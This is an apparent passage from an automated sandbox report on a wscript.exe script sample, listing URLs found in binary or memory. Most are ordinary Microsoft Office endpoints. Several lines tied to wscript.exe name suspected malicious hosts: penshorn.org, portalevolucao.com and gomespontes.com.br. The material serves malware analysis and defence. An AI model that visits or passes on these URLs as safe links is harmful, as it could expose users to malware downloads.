                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://config.edge.skype.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cortana.ai
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cortana.ai/api
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cr.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://d.docs.live.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dataservice.o365filtering.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dev.cortana.ai
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://devnull.onenote.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://directory.services.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://graph.ppe.windows.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://graph.ppe.windows.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://graph.windows.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://graph.windows.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://invites.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://lifecycle.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://login.microsoftonline.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://login.windows.local
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://make.powerautomate.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://management.azure.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://management.azure.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.action.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.engagement.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://messaging.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://microsoftapc-my.sharepoint.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ncus.contentsync.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ncus.pagecontentsync.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://officeapps.live.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://onedrive.live.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://onedrive.live.com/embed?
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://otelrules.azureedge.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office365.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office365.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pages.store.office.com/review/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                    Source: wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410172116.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402988298.0000000005608000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406263704.00000000056BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407270465.000000000577D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413912205.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406263704.00000000056A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405862655.0000000005655000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419338760.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412417949.0000000005749000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401650734.00000000055E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406822038.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420563216.0000000005750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401711047.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                    Source: wscript.exe, 00000001.00000002.420756352.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410172116.0000000005963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/8.0)
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                    Source: wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409805499.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409314654.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412084830.0000000005929000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410032068.0000000005922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409380578.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409564770.00000000058EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/w35047
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://powerlift.acompli.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://pushchannel.1drv.ms
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://settings.outlook.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://shell.suite.office.com:1443
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://staging.cortana.ai
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://store.office.de/addinstemplate
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://tasks.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://webshell.suite.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://wus2.contentsync.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://wus2.pagecontentsync.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                    Source: wscript.exe, 00000001.00000003.412126322.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420955265.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410855988.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.0000000005A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/
                    Source: wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.411607010.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420832267.00000000059A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/R
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412126322.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412574414.0000000005145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 